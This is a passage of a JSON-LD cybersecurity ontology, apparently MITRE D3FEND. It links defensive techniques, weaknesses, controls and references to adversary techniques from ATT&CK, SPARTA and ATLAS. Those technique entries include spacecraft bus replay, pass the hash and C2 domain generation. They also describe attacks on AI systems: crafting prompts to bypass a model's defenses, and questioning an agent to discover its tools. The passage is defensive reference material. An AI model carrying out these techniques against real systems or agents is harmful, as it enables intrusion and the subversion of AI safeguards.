      "d3f:definition": "Instead of the RF path, the attacker targets internal command/data handling by injecting or retransmitting messages on the spacecraft bus (e.g., 1553, SpaceWire, custom). Because many subsystems act on the latest message or on message rate rather than on uniqueness, a flood of historical yet well-formed frames can consume bandwidth, starve critical publishers, or cause subsystems to perform the same action repeatedly. Secondary effects include stale sensor values being re-consumed, watchdog timers being reset at incorrect intervals, and autonomy rules misclassifying the situation due to out-of-order but valid-looking events. On time-triggered or scheduled buses, replaying at precise offsets can collide with or supersede legitimate messages, steering system state without changing software. The goal is to harness the bus’s determinism, repeating prior internal stimuli to recreate prior effects or to induce resource exhaustion.",
      "d3f:produces": {
        "@id": "d3f:BusNetworkTraffic"
      },
      "rdfs:label": "Bus Traffic Replay - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0001/02/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EX-0001"
        },
        {
          "@id": "_:Nf2c796c044e84ba99f3d8fd726f6e770"
        }
      ],
      "skos:prefLabel": "Bus Traffic Replay"
    },
    {
      "@id": "_:Nf2c796c044e84ba99f3d8fd726f6e770",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BusNetworkTraffic"
      }
    },
    {
      "@id": "d3f:AML.T0065",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0065",
      "d3f:definition": "Adversaries may use their acquired knowledge of the target generative AI system to craft prompts that bypass its defenses and allow malicious instructions to be executed.\n\nThe adversary may iterate on the prompt to ensure that it works as-intended consistently.",
      "rdfs:label": "LLM Prompt Crafting - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0065"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASResourceDevelopmentTechnique"
      },
      "skos:prefLabel": "LLM Prompt Crafting"
    },
    {
      "@id": "d3f:ModalLogic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-ML",
      "d3f:definition": "Modal logic is a collection of formal systems developed to represent statements about necessity and possibility. It plays a major role in philosophy of language, epistemology, metaphysics, and natural language semantics.",
      "d3f:kb-article": "## References\n1. Modal logic. (2023, June 4). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Modal_logic)",
      "rdfs:label": "Modal Logic",
      "rdfs:subClassOf": {
        "@id": "d3f:SymbolicAI"
      }
    },
    {
      "@id": "d3f:UserInputFunction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Generic function that receives direct user input from an untrusted source.",
      "rdfs:label": "User Input Function",
      "rdfs:subClassOf": {
        "@id": "d3f:InputFunction"
      }
    },
    {
      "@id": "d3f:T1637",
      "@type": "owl:Class",
      "d3f:attack-id": "T1637",
      "d3f:definition": "Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. This algorithm can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.",
      "rdfs:label": "Dynamic Resolution - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCommandAndControlTechnique"
      },
      "skos:prefLabel": "Dynamic Resolution"
    },
    {
      "@id": "d3f:UnlockAccount",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:UnlockAccount"
      ],
      "d3f:d3fend-id": "D3-ULA",
      "d3f:definition": "Restoring a user account's access to resources by unlocking a locked User Account.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-CybersecurityIncidentandVulnerabilityResponsePlaybooks"
      },
      "d3f:restores": {
        "@id": "d3f:UserAccount"
      },
      "rdfs:label": "Unlock Account",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:RestoreUserAccountAccess"
        },
        {
          "@id": "_:N9251a249731b4a00801a1cb3b47f5b05"
        }
      ]
    },
    {
      "@id": "_:N9251a249731b4a00801a1cb3b47f5b05",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restores"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:Reference-HostIntrusionPreventionSystemUsingSoftwareAndUserBehaviorAnalysis_SophosLtd",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20110023115A1"
      },
      "d3f:kb-abstract": "In embodiments of the present invention improved capabilities are described for threat detection using a behavioral-based host-intrusion prevention method and system for monitoring a user interaction with a computer, software application, operating system, graphic user interface, or some other component or client of a computer network, and performing an action to protect the computer network based at least in part on the user interaction and a computer code process executing during or in association with a computer usage session.",
      "d3f:kb-author": "Clifford C. Wright",
      "d3f:kb-mitre-analysis": "The patent describes a technique for performing behavior based threat detection. User and code behavior data is collected and stored to create baseline user and code behavior profiles. User behavior data collected over a user session or over multiple sessions can include a user:\n\n* clicking on a link\n* scrolling down a page\n* opening or closing a window\n* downloading a file\n* saving a file\n* running a file\n* typing a keyword\n\nCode behavior monitored includes code:\n\n* copying itself to a system folder\n* setting a run key to itself in the registry\n* setting a second runkey to itself in the registry in\na different location\n* disabling OS tools in the registry\n* opening a hidden file\n\nThe user interaction and the code process executed during the user session are monitored and compared with predetermined malicious behavior profiles that are typically present in a malicious user session.  The predetermined collection of malicious behaviors are created based on analysis of families of malware in run time in a threat research facility. If a match is made an action is taken that can include isolating the computer on which the user interaction occurs and limiting network access to or from the computer.",
      "d3f:kb-organization": "Sophos Ltd",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:ResourceAccessPatternAnalysis"
        },
        {
          "@id": "d3f:SystemDaemonMonitoring"
        },
        {
          "@id": "d3f:WebSessionActivityAnalysis"
        }
      ],
      "d3f:kb-reference-title": "Host intrusion prevention system using software and user behavior analysis",
      "rdfs:label": "Reference - Host intrusion prevention system using software and user behavior analysis - Sophos Ltd"
    },
    {
      "@id": "d3f:CertificateAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:CertificateAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:CertificateFile"
      },
      "d3f:d3fend-id": "D3-CA",
      "d3f:definition": "Analyzing Public Key Infrastructure certificates to detect if they have been misconfigured or spoofed using both network traffic, certificate fields and third-party logs.",
      "d3f:kb-article": "## How it works\nCertificate Analysis ensures that the data elements of the certificate are current and anchored in a known trust model. Certificate authorities, revocation lists, and third-party secure logs are used in the analysis. Analysis includes detection of server impersonation, phishing domains, and forged certificates.\n\nTLS certificates are designed to expire to ensure that the cryptographic keys are forced to be changed on a regular basis. The certificates in the trust path also expire and can cause a break in the trust chain. This means that even if a server certificate is updated correctly, intermediate certificates can expire and the trust chain is not maintained. This can cause services to become unavailable.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SecuringWebTransactions"
      },
      "rdfs:label": "Certificate Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "_:Ned1d89aefc53456bae3da69698f43505"
        }
      ]
    },
    {
      "@id": "_:Ned1d89aefc53456bae3da69698f43505",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CertificateFile"
      }
    },
    {
      "@id": "d3f:PowerAndThermalDeviceEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving power supplies, batteries, or thermal management devices. These events represent changes in power states, temperature thresholds, or cooling system activity.",
      "rdfs:label": "Power and Thermal Device Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDeviceEvent"
        },
        {
          "@id": "_:N02059d89ee914dffa8bbcaab7caf90de"
        }
      ]
    },
    {
      "@id": "_:N02059d89ee914dffa8bbcaab7caf90de",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Sensor"
      }
    },
    {
      "@id": "d3f:UserSessionInitConfigAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:UserSessionInitConfigAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:UserInitConfigurationFile"
      },
      "d3f:d3fend-id": "D3-USICA",
      "d3f:definition": "Analyzing modifications to user session config files such as .bashrc or .bash_profile.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-IdentificationAndExtractionOfKeyForensicsIndicatorsOfCompromiseUsingSubject-specificFilesystemViews"
        },
        {
          "@id": "d3f:Reference-RegistryKeySecurityAndAccessRights"
        },
        {
          "@id": "d3f:Reference-CAR-2020-09-002%3AComponentObjectModelHijacking_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2020-11-011%3ARegistryEditFromScreensaver"
        }
      ],
      "d3f:synonym": "User Startup Config Analysis",
      "rdfs:label": "User Session Init Config Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OperatingSystemMonitoring"
        },
        {
          "@id": "_:N3fe96addbd9741a4b762926f62d84ec9"
        }
      ]
    },
    {
      "@id": "_:N3fe96addbd9741a4b762926f62d84ec9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserInitConfigurationFile"
      }
    },
    {
      "@id": "d3f:OTChangeDataCommand",
      "@type": "owl:Class",
      "d3f:definition": "OT command that modifies existing data on a remote device.",
      "rdfs:comment": [
        "BACnet: atomicWriteFile\nBACnet: writeProperty\nBACnet: writePropertyMultiple\nBACnet: write-group ",
        "CIP: Set Attributes All\nCIP: Set Attribute List\nCIP: Set Attribute Single\nCIP: Set Member",
        "GE-SRTP: WRITE SYSTEM MEMORY\nGE-SRTP: WRITE TASK MEMORY ",
        "Modbus: Write Single Coil\nModbus: Write Single Register\nModbus: Write Multiple Coils\nModbus: Write Multiple Registers\nModbus: Write File Record\nModbus: Mask Write Register\nModbus: Read Write Register"
      ],
      "rdfs:label": "OT Change Data Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTWriteCommand"
      }
    },
    {
      "@id": "d3f:TimeSeriesDatabase",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A specialized database optimized for storing and retrieving time-stamped data.",
      "rdfs:label": "Time Series Database",
      "rdfs:subClassOf": {
        "@id": "d3f:Database"
      }
    },
    {
      "@id": "d3f:REC-0001.01",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0001.01",
      "d3f:definition": "Adversaries target knowledge of flight and ground software to identify exploitable seams and to build high-fidelity emulators for rehearsal. Valuable details include RTOS selection and version, process layout, inter-process messaging patterns, memory maps and linker scripts, fault-detection/isolation/recovery logic, mode management and safing behavior, command handlers and table services, bootloaders, patch/update mechanisms, crypto libraries, device drivers, and test harnesses. Artifacts may be source code, binaries with symbols, stripped images with recognizable patterns, configuration tables, and SBOMs that reveal vulnerable dependencies. With these, a threat actor can reverse engineer command parsing, locate debug hooks, craft inputs that bypass FDIR, or time payload and bus interactions to produce cascading effects. Supply-chain access to vendors of COTS components, open-source communities, or integrators can be used to insert weaknesses or to harvest build metadata. Even partial disclosures, such as a unit test name, an assert message, or a legacy API, shrink the search space for exploitation.",
      "rdfs:label": "Software Design - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0001/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0001"
      },
      "skos:prefLabel": "Software Design"
    },
    {
      "@id": "d3f:CWE-1319",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1319",
      "d3f:definition": "The device is susceptible to electromagnetic fault injection attacks, causing device internal information to be compromised or security mechanisms to be bypassed.",
      "rdfs:label": "Improper Protection against Electromagnetic Fault Injection (EM-FI)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-693"
      }
    },
    {
      "@id": "d3f:NetworkTrafficFiltering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:NetworkTrafficFiltering"
      ],
      "d3f:d3fend-id": "D3-NTF",
      "d3f:definition": "Restricting network traffic originating from any location.",
      "d3f:filters": [
        {
          "@id": "d3f:NetworkTraffic"
        },
        {
          "@id": "d3f:OTProtocolMessage"
        },
        {
          "@id": "d3f:RemoteCommand"
        }
      ],
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-ActiveFirewallSystemAndMethodology_McAfeeLLC"
        },
        {
          "@id": "d3f:Reference-AutomaticallyGeneratingRulesForConnectionSecurity_Microsoft"
        },
        {
          "@id": "d3f:Reference-FWTK-FirewallToolkit_"
        },
        {
          "@id": "d3f:Reference-FirewallForInterentAccess_SecureComputingLLC"
        },
        {
          "@id": "d3f:Reference-FirewallForProcessingAConnectionlessNetworkPacket_NationalSecurityAgency"
        },
        {
          "@id": "d3f:Reference-FirewallForProcessingConnection-orientedAndConnectionlessDatagramsOverAConnection-orientedNetwork_NationalSecurityAgency"
        },
        {
          "@id": "d3f:Reference-FirewallsThatFilterBasedUponProtocolCommands_IntelCorp"
        },
        {
          "@id": "d3f:Reference-MethodForControllingComputerNetworkSecurity_CheckpointSoftwareTechnologiesLtd"
        },
        {
          "@id": "d3f:Reference-NetworkFirewallWithProxy_SecureComputingLLC"
        }
      ],
      "rdfs:label": "Network Traffic Filtering",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkIsolation"
        },
        {
          "@id": "_:N6319c44ae4c84d1786c20e18d3c61a54"
        },
        {
          "@id": "_:N06d9f7bfcd6e43e08790aa54e392546f"
        },
        {
          "@id": "_:N02312712e3594ce08f51458628cd4c84"
        }
      ]
    },
    {
      "@id": "_:N6319c44ae4c84d1786c20e18d3c61a54",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:filters"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "_:N06d9f7bfcd6e43e08790aa54e392546f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:filters"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTProtocolMessage"
      }
    },
    {
      "@id": "_:N02312712e3594ce08f51458628cd4c84",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:filters"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RemoteCommand"
      }
    },
    {
      "@id": "d3f:UserAccountUpdateEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event capturing updates to a user account, including changes to its attributes or configuration.",
      "rdfs:label": "User Account Update Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserAccountEvent"
        },
        {
          "@id": "_:N219da764c4864539ab3d6928282d1935"
        }
      ]
    },
    {
      "@id": "_:N219da764c4864539ab3d6928282d1935",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccountCreationEvent"
      }
    },
    {
      "@id": "d3f:Reference-LUKS1On-DiskFormatSpecificationVersion1.2.3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://mirrors.edge.kernel.org/pub/linux/utils/cryptsetup/LUKS_docs/on-disk-format.pdf"
      },
      "d3f:kb-abstract": "LUKS is short for \"Linux Unified Key Setup\". It has initially been developed to remedy the unpleasantness a user experienced that arise from deriving the encryption setup from changing user space, and forgotten command line arguments. The result of this changes are an unaccessible encryption storage. The reason for this to happen was, a unstandardised way to read, process and set up encryption keys, and if the user was unlucky, he upgraded to an incompatible version of user space tools that needed a good deal of knowledge to use with old encryption volumes.",
      "d3f:kb-author": "Clemens Fruhwirth",
      "d3f:kb-reference-of": {
        "@id": "d3f:DiskEncryption"
      },
      "d3f:kb-reference-title": "LUKS1 On-Disk Format SpecificationVersion 1.2.3",
      "rdfs:label": "Reference - LUKS1 On-Disk Format SpecificationVersion 1.2.3"
    },
    {
      "@id": "d3f:T1071.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1071.002",
      "d3f:definition": "Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetFileTransferTraffic"
      },
      "rdfs:label": "File Transfer Protocols",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1071"
        },
        {
          "@id": "_:N09f7df9108f94834b8618f95247ec296"
        }
      ]
    },
    {
      "@id": "_:N09f7df9108f94834b8618f95247ec296",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetFileTransferTraffic"
      }
    },
    {
      "@id": "d3f:CWE-662",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-662",
      "d3f:definition": "The product utilizes multiple threads or processes to allow temporary access to a shared resource that can only be exclusive to one process at a time, but it does not properly synchronize these actions, which might cause simultaneous accesses of this resource by multiple threads or processes.",
      "rdfs:label": "Improper Synchronization",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-664"
        },
        {
          "@id": "d3f:CWE-691"
        }
      ]
    },
    {
      "@id": "d3f:T1593",
      "@type": "owl:Class",
      "d3f:attack-id": "T1593",
      "d3f:definition": "Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)",
      "rdfs:label": "Search Open Websites/Domains",
      "rdfs:subClassOf": {
        "@id": "d3f:ReconnaissanceTechnique"
      }
    },
    {
      "@id": "d3f:T1590.006",
      "@type": "owl:Class",
      "d3f:attack-id": "T1590.006",
      "d3f:definition": "Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.",
      "rdfs:label": "Network Security Appliances",
      "rdfs:subClassOf": {
        "@id": "d3f:T1590"
      }
    },
    {
      "@id": "d3f:OTProtocolMessage",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Packets generated by an operational technology protocol contain an OT protocol message.",
      "rdfs:label": "OT Protocol Message",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalMessage"
      }
    },
    {
      "@id": "d3f:HTTPRequestEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an HTTP request is sent from a client to a server over an established TCP connection.",
      "rdfs:label": "HTTP Request Event",
      "rdfs:subClassOf": {
        "@id": "d3f:HTTPEvent"
      }
    },
    {
      "@id": "d3f:T1075",
      "@type": "owl:Class",
      "d3f:attack-id": "T1075",
      "d3f:definition": "Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1550.002",
      "rdfs:label": "Pass the Hash",
      "rdfs:seeAlso": {
        "@id": "d3f:T1550.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:LateralMovementTechnique"
      }
    },
    {
      "@id": "d3f:VariableTypeValidation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3-VTV",
      "d3f:definition": "Ensuring that a variable has the correct type.",
      "d3f:hardens": {
        "@id": "d3f:PointerDereferencingFunction"
      },
      "d3f:kb-article": "## How it Works\nA developer should consider how the variable will be used throughout the program and choose the correct variable type.\nA developer should programmatically check if a variable has the correct (expected) type before using that variable.\n\n## Considerations\n* The result of an operation on an unexpected variable type will vary based on the language.\n* Note: This resource should not be considered a definitive or exhaustive coding guideline.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-TypeSystems_Princeton"
      },
      "rdfs:label": "Variable Type Validation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SourceCodeHardening"
        },
        {
          "@id": "_:Nc37977acba8144c1aa2f486a192bdb21"
        }
      ]
    },
    {
      "@id": "_:Nc37977acba8144c1aa2f486a192bdb21",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:hardens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PointerDereferencingFunction"
      }
    },
    {
      "@id": "d3f:First-orderLogic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-FOL",
      "d3f:definition": "First-order logic is a collection of formal systems used in mathematics, philosophy, linguistics, and computer science. First-order logic uses quantified variables over non-logical objects, and allows the use of sentences that contain variables.",
      "d3f:kb-article": "## How it works\n\nFor propositions such as \"Socrates is a man\", one can have expressions in the form \"there exists x such that x is Socrates and x is a man\", where \"there exists\" is a quantifier, while x is a variable. This distinguishes it from propositional logic, which does not use quantifiers or relations.\n\nThe term \"first-order\" distinguishes first-order logic from higher-order logic, in which there are predicates having predicates or functions as arguments, or in which quantification over predicates, functions, or both, are permitted.\n\n## Considerations\n\n- Advantages:\n-- First-order logic is more expressive than propositional logic; one can talk about objects and their properties, relations between objects.\n-- First-order logic is able to make use of variables and quantifiers (e.g., \"for all\" and \"exists\".)\n-- First-order logic supports power forms of reasoning, such as inferring the properties of an unknown object from the properties of known objects.\n\n- Disadvantages:\n-- First-order logic is more difficult to learn and use than propositional logic, due to its greater complexity.\n-- First-order logic is also less tractable than propositional logic in many cases; reasoning about quantifiers and variables adds complexity.\n-- First-order logic can be difficult to apply in practice, due to the need to find appropriate axioms and rules for each application.\n\n### Verification Approach\n\n- Automated theorem provers can assist in formal verification, performing automated reasoning over system modeled in first-order logic and explore a complete space of system behaviors\n- First-order logic may be more expressive than necessary for many types of problems and may be more difficult to verify by SMEs.\n- Theorem provers based in FOL are capable of use in software verification tasks, but an SMT solver such as Z3 might be more appropriate.\n- Defining a set of competency questions (i.e., query use cases for a first-order logic ontology) can help scope the logic required for a complete solution.\n\n### Validation Approach\n\n- Domain SMEs should be identified to review the analytics results and compare them to expected results for a given input.\n- Where possible, an outside team of SMEs should inspect the formal logic specification of a system against its stated requirements and suitability to address its domain problem sets.\n- Defining a set of competency questions and the expected results provides one means of validation.\n\n## References\n\n1.  First-order logic. (2023, May 26). In _Wikipedia_.  [Link](https://en.wikipedia.org/wiki/First-order_logic)\n2. Shapiro, S. and Kissel, T. Classical Logic. (2022). Stanford Encyclopedia of Philosophy. [Link](https://plato.stanford.edu/entries/logic-classical/)\n3. A.I. For Anyone. First-order Logic (n.d.). [Link](https://www.aiforanyone.org/glossary/first-order-logic)\n4. Smith, P. An Introduction to Formal Logic. (2020). [Link](https://doi.org/10.1017/9781108328999)\n5. Gruninger, M. and Fox, M. (1995). Methodology for the Design and Evaluation of Ontologies. [Link](https://www.researchgate.net/publication/2288533_Methodology_for_the_Design_and_Evaluation_of_Ontologies)\n6. Keet, C., Suarez-Figurosa, M., and Poveda-Villalon, M. (2014). Pitfalls in Ontologies and TIPS to Prevent Them. [Link](https://dl.acm.org/doi/10.4018/ijswis.2014040102)\n7. Bjorner, N. et al. The inner magic behind the Z3 theorem prover. (2019) [Link](https://www.microsoft.com/en-us/research/blog/the-inner-magic-behind-the-z3-theorem-prover/)",
      "d3f:synonym": [
        "FOL",
        "First-order Predicate Calculus",
        "Quantificational Logic"
      ],
      "rdfs:label": "First-order Logic",
      "rdfs:subClassOf": {
        "@id": "d3f:PredicateLogic"
      }
    },
    {
      "@id": "d3f:LinuxWrite",
      "@type": "owl:Class",
      "d3f:definition": "Write to a file descriptor.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/write.2.html"
      },
      "rdfs:label": "Linux Write",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIWriteFile"
      }
    },
    {
      "@id": "d3f:OperatingSystemMonitoring",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OperatingSystemMonitoring"
      ],
      "d3f:d3fend-id": "D3-OSM",
      "d3f:definition": "The operating system software, for D3FEND's purposes, includes the kernel and its process management functions, hardware drivers, initialization or boot logic. It also includes and other key system daemons and their configuration. The monitoring or analysis of these components for unauthorized activity constitute **Operating System Monitoring**.",
      "d3f:enables": {
        "@id": "d3f:Detect"
      },
      "d3f:kb-article": "## Technique Overview\n\n\"An operating system (OS) is system software that manages computer hardware and software resources and provides common services for computer programs.\" [1]\n\nOperating System Monitoring Techniques have varied implementations including built-in kernel modules, third-party privileged system daemons, or even standard systems administration tools included with an operating system.\n\n1. http://dbpedia.org/resource/Operating_system",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-HostIntrusionPreventionSystemUsingSoftwareAndUserBehaviorAnalysis_SophosLtd"
        },
        {
          "@id": "d3f:Reference-UserActivityFromClearingEventLogs_MITRE"
        }
      ],
      "rdfs:label": "Operating System Monitoring",
      "rdfs:subClassOf": {
        "@id": "d3f:PlatformMonitoring"
      }
    },
    {
      "@id": "d3f:AML.T0084",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0084",
      "d3f:definition": "Adversaries may attempt to discover configuration information for AI agents present on the victim's system. Agent configurations can include tools or services they have access to.\n\nAdversaries may directly access agent configuring dashboards or configuration files. They may also obtain configuration details by prompting the agent with questions such as \"What tools do you have access to?\"\n\nAdversaries can use the information they discover about AI agents to help with targeting.",
      "rdfs:label": "Discover AI Agent Configuration - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0084"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASDiscoveryTechnique"
      },
      "skos:prefLabel": "Discover AI Agent Configuration"
    },
    {
      "@id": "d3f:CentralTendency",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-CT",
      "d3f:definition": "A measure of central tendency ) is a summary measure that attempts to describe a whole set of data with a single value that represents the middle or centre of its distribution.",
      "d3f:kb-article": "## References\nAustralian Bureau of Statistics. (n.d.). Measures of Central Tendency. [Link](https://www.abs.gov.au/statistics/understanding-statistics/statistical-terms-and-concepts/measures-central-tendency)\n\nWikipedia. (n.d.). Central tendency. [Link](https://en.wikipedia.org/wiki/Central_tendency)",
      "rdfs:label": "Central Tendency",
      "rdfs:subClassOf": {
        "@id": "d3f:DescriptiveStatistics"
      }
    },
    {
      "@id": "d3f:ATTACKMergedThing",
      "@type": "owl:Class",
      "rdfs:label": "ATTACK Merged Thing",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKThing"
      }
    },
    {
      "@id": "d3f:CCI-000352_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system prevents the installation of organization-defined critical software programs that are not signed with a certificate that is recognized and approved by the organization.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:ExecutableAllowlisting"
        },
        {
          "@id": "d3f:ExecutableDenylisting"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-18T00:00:00"
      },
      "rdfs:label": "CCI-000352"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_14",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Security or Privacy Policy Filter Constraints",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "AC-4(14)"
    },
    {
      "@id": "d3f:CCI-001124_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:BroadcastDomainIsolation"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system prevents discovery of specific system components composing a managed interface.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001124"
    },
    {
      "@id": "d3f:Satellite",
      "@type": "owl:Class",
      "d3f:definition": "A satellite or an artificial satellite is an object, typically a spacecraft, placed into orbit around a celestial body. They have a variety of uses, including communication relay, weather forecasting, navigation (GPS), broadcasting, scientific research, and Earth observation.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Satellite"
      },
      "rdfs:label": "Satellite",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Spacecraft"
        },
        {
          "@id": "_:N6b04a36be489476d987941d6cfeb2747"
        }
      ]
    },
    {
      "@id": "_:N6b04a36be489476d987941d6cfeb2747",
